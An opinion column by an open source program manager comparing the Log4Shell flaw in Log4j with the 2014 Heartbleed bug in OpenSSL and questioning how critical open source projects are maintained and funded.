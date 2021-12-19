



A serious security vulnerability is discovered in open source software widely used behind the scenes on the internet but little known to the average person that can give attackers access to a treasure trove of sensitive data.

The incident shows how a vulnerability in a seemingly simple piece of infrastructure code can threaten the security of banks, tech companies, governments, and just about any other type of organization.

Businesses are rushing to fix the problem, but fear it will affect the internet for years to come.

It sounds like Log4Shell, the hitherto unknown flaw in a ubiquitous, free program that has scared experts since its discovery last week, doesn’t it? Yes, but it also describes a weirdly similar episode from 2014. Remember Heartbleed?

Heartbleed was a bug in OpenSSL, the most popular open source code library for running the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols used to encrypt websites and software.

The flaw, which allowed hackers to trick a vulnerable web server into sending it encryption keys and other confidential information, was linked to several attacks, including one against a major US hospital operator that resulted in the theft of 4 , 5 million health records. Researchers from Google and software company Codemonicon independently discovered the vulnerability and reported it in April 2014.

After Heartbleed was discovered, the world wondered how malicious actors could have compromised software so essential to the secure functioning of the Internet. For many, the incident also raised questions about the security of all open source software.

Fast forward to December 2021 and those same questions are surfacing.

Like OpenSSL, Log4j, the Java program compromised by the Log4Shell bug, is a widely used cross-platform open source library. Developed and maintained under the auspices of the fully volunteer Apache Software Foundation, Log4j is deployed on servers to record user activities so that they can be analyzed later by security or development teams.

Hackers could use the vulnerability to access sensitive information on various devices, launch ransomware attacks, and take over machines to mine for cryptocurrencies. The vulnerability was discovered almost by accident, when Microsoft announced that it had discovered suspicious activity in Minecraft: Java Edition, a popular video game it owns.

Jen Easterly, Director of the Department of Homeland Securitys’ Cybersecurity and Infrastructure Security Agency, said: To be clear, this vulnerability poses a serious risk. We urge all organizations to join us in this essential effort and take action.

Like Heartbleed, Log4Shell illustrates how the prevalence of open source software in businesses around the world, programs like OpenSSL and Log4j and the multitude of codes that depend on them in modern software development have increasingly made it a target of favorite attack.

Almost all organizations now use some amount of open source, thanks to advantages such as lower cost compared to proprietary software and flexibility in a world increasingly dominated by cloud computing. Open source isn’t going to go away anytime soon, on the contrary and hackers know it.

As for what Log4Shell says about open source security, I think that raises more questions than it answers. I generally agree that open source software has security benefits because of the many watchful eyes behind all those contributors around the world who are committed to the quality and safety of the programs. But a few questions are fair to ask:

Who watches the doors when it comes to securing fundamental programs like Log4j? The Apache Foundation says it has over 8,000 contributors collaborating on 350 projects and initiatives, but how many are hired to keep tabs on an older, perhaps boring, one like Log4j?

Big companies with deep pockets outside of Google, which always seems to be heavily involved in such issues, should they be doing more to support the cause with people and resources?

And, finally, why does it always seem like it takes a vulnerability disclosure in an open source program before the world realizes how critical that program is? Is the industry doing enough to recognize what these software packages are and prioritize their security?

Log4Shell, like Heartbleed before it, demonstrates that, if nothing else, these questions need to be asked and answered.

Justin Dorfman is the open source program manager at cybersecurity company Reblaze.

